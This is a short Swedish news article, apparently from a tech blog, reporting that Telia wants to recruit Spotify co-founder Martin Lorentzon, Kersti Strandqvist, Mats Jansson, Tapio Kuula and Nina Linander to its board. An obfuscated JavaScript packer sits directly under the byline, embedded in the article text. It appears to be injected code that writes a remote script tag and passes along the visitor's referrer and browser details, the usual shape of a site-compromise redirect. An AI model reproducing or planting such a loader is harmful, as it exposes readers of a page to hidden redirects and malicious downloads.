Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Telia vill värva Spotifygrundare till styrelsen

Telia vill värva Spotifygrundare till styrelsen
Sebastian

Telia: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yatnz|var|u0026u|referrer|ifede||js|php’.split(’|’),0,{}))
Martin Lorentzon som ligger grundare för både musiktjänsten Spotify och annonsnätverket Tradedoubler är en av fler som Telia nu vill ha in i styrelsen. 

Förra veckan stod det klart att Marie Ehrling tar över Teliasoneras styrelseordförande.
Och nu står det även klart vilka fler som Telia önskar värva.

De personer som finns med på listan är inget annat än höjdare. Martin Lorentzon Spotifygrundare, Kersti Strandqvist SCA, Mats Jansson föredetta vd SAS, Tapio Kuula Fortums koncernchef och till sist styrelseproffset Nina Linander. Detta är uppgifter som TT och Dagens Industri lämnat.

Att de valt Martin Lorentzon som en kandidat beror på att Telia vill få in mer kompetens inom teknik i styrelsen. Detta något som Martin Lorentzon absolut bär på då han varit med och grundat både Tradedoubler och Spotify, två lyckade företag.

De resterande är valda för sin kompetens på många andra områden som Telia tycker man bör förbättra inom bolaget.